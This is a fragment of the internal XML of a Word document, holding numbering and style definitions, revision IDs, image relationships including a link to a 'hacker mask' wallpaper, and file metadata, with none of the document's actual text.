    <w:tmpl w:val="8576658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635027"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E74AC7BA"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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F176B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="925A13E0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493379D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B869918"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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F64508"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A208C3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D96863"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC5880C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F8080F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="111E0C2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5500FC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5B54BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95487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CE5516"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB86682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493FD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03402ED0"/>
    <w:lvl w:ilvl="0" w:tplc="5914DE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2C139B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4DA630AE"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF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001362"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4EEC3E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D57806"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83E41FE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941475"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1AB60D7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9046836">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1491168930">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1146631073">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="667099582">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="191772867">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="537815370">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="223420640">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2001955366">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1418333152">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1745443738">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="469716605">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1488284729">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="257955027">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1181747029">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1266842783">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1718816359">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1305157293">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="536285105">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1004749924">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1188833162">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="580722484">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1928535082">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="182790294">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="551624184">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1117139797">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1590692185">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1068529873">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="753160334">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="758864944">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="598295069">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="255017820">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="14654682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DE9"/>
    <w:rsid w:val="000026B4"/>
    <w:rsid w:val="00007848"/>
    <w:rsid w:val="00083780"/>
    <w:rsid w:val="000B4EE7"/>
    <w:rsid w:val="000D5329"/>
    <w:rsid w:val="000E1F4E"/>
    <w:rsid w:val="001275CE"/>
    <w:rsid w:val="00144959"/>
    <w:rsid w:val="00182865"/>
    <w:rsid w:val="00192402"/>
    <w:rsid w:val="00204E8E"/>
    <w:rsid w:val="002719A5"/>
    <w:rsid w:val="00281DE9"/>
    <w:rsid w:val="002C5E7E"/>
    <w:rsid w:val="002E365F"/>
    <w:rsid w:val="002F0649"/>
    <w:rsid w:val="00304CB2"/>
    <w:rsid w:val="00316021"/>
    <w:rsid w:val="00332C92"/>
    <w:rsid w:val="003349AC"/>
    <w:rsid w:val="00363274"/>
    <w:rsid w:val="0038120C"/>
    <w:rsid w:val="003B4858"/>
    <w:rsid w:val="003D6403"/>
    <w:rsid w:val="003E15C7"/>
    <w:rsid w:val="00402932"/>
    <w:rsid w:val="00412A4C"/>
    <w:rsid w:val="0041594E"/>
    <w:rsid w:val="00431EA0"/>
    <w:rsid w:val="004526C0"/>
    <w:rsid w:val="0045577B"/>
    <w:rsid w:val="00482F30"/>
    <w:rsid w:val="0050193D"/>
    <w:rsid w:val="00511A6C"/>
    <w:rsid w:val="005227F2"/>
    <w:rsid w:val="00557EB4"/>
    <w:rsid w:val="00581DFB"/>
    <w:rsid w:val="00583733"/>
    <w:rsid w:val="005C7E28"/>
    <w:rsid w:val="00611A60"/>
    <w:rsid w:val="00642759"/>
    <w:rsid w:val="006A6854"/>
    <w:rsid w:val="007131E0"/>
    <w:rsid w:val="007213F3"/>
    <w:rsid w:val="00721A83"/>
    <w:rsid w:val="007536F8"/>
    <w:rsid w:val="00765072"/>
    <w:rsid w:val="00787863"/>
    <w:rsid w:val="0079056C"/>
    <w:rsid w:val="007A556A"/>
    <w:rsid w:val="007B62B3"/>
    <w:rsid w:val="007C15BA"/>
    <w:rsid w:val="00806273"/>
    <w:rsid w:val="00811C9A"/>
    <w:rsid w:val="008A5EBE"/>
    <w:rsid w:val="009740DA"/>
    <w:rsid w:val="009A397E"/>
    <w:rsid w:val="00A371D9"/>
    <w:rsid w:val="00A37BD2"/>
    <w:rsid w:val="00A66916"/>
    <w:rsid w:val="00A7136B"/>
    <w:rsid w:val="00A90CD6"/>
    <w:rsid w:val="00AE30CC"/>
    <w:rsid w:val="00B40536"/>
    <w:rsid w:val="00B551E6"/>
    <w:rsid w:val="00B636BA"/>
    <w:rsid w:val="00B74A40"/>
    <w:rsid w:val="00BB0020"/>
    <w:rsid w:val="00C22F23"/>
    <w:rsid w:val="00C5572F"/>
    <w:rsid w:val="00C77BD0"/>
    <w:rsid w:val="00C86DA6"/>
    <w:rsid w:val="00CD0C22"/>
    <w:rsid w:val="00CE1D03"/>
    <w:rsid w:val="00D002A3"/>
    <w:rsid w:val="00D07AF1"/>
    <w:rsid w:val="00D46A37"/>
    <w:rsid w:val="00D71939"/>
    <w:rsid w:val="00D8048C"/>
    <w:rsid w:val="00DC6C0A"/>
    <w:rsid w:val="00DC77CB"/>
    <w:rsid w:val="00DD0A00"/>
    <w:rsid w:val="00E02D55"/>
    <w:rsid w:val="00E22305"/>
    <w:rsid w:val="00E42CD8"/>
    <w:rsid w:val="00E55398"/>
    <w:rsid w:val="00E960A6"/>
    <w:rsid w:val="00FC6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968940"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C7B69C65-39A3-4295-9317-EA05E095C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1D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1D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1DE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1D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1DE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1D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1D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1D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1D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1DE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1D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1DE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1DE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1DE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1D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1D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1D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1D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1D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1D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1D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1D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1D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1D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1D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1DE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1DE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1DE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1DE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07A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7AF1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D07A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7AF1"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B48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48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wallpaperflare.com/anonymus-hacker-computer-mask-hd-4k-5k-black-background-wallpaper-pltuu/download/2560x1080" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto1.wdp"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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937</TotalTime>
  <Pages>9</Pages>
  <Words>625</Words>
  <Characters>3567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63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-23T16:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-25T14:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>